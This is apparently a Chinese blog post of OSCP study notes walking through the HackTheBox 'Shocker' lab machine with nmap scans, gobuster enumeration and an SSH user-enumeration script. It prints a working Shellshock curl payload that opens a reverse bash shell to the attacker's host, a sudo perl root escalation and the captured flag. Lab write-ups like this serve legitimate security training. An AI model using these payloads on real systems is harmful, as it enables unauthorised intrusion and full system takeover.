OSCP备考_0x01_HackThBox靶机_Linux_Shocker

Ethan医生3个月前靶场103

先连接到外网开放的服务器openvpn xxx.ovpn

信息收集

nmap -p- 10.129.216.48 (这样扫描太慢了)

image.png

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.48 (扫描TCP)

image.png

nmap -sU --top-ports 100 10.129.216.48(扫描UDP)

image.png


看到2222有枚举先测试看看

python2.7 40136.py 10.129.216.48:2222 -U /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt -e


先查看80端口有啥Don't Bug Me!

image.png

先把图片下载下来看里面有啥 ,没有啥线索,只能爆破看看

gobuster dir -u http://10.129.216.48/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

gobuster dir -u http://10.129.216.48/ -w /usr/share/wordlists/dirb/big.txt   (为啥使用dirb/big 因为有cgi-bin目录)

image.png

再看cgi-bin底下有没有可以利用的文件

image.png

gobuster dir -u http://10.129.216.48/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x pl,sh,cgi

image.png

发现有个user.sh,让我想到shellshock

curl -A "() { :;};/bin/bash -i &>/dev/tcp/10.10.16.31/3333 <&1" http://10.129.216.48/cgi-bin/user.sh 


nc -lvnp 3333 

image.png


sudo -l

image.png

sudo perl -e 'exec "/bin/sh";' 提权收工

image.png

17b1ba945c650cd12b9da192b64b7b72

标签: OSCP

相关文章

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。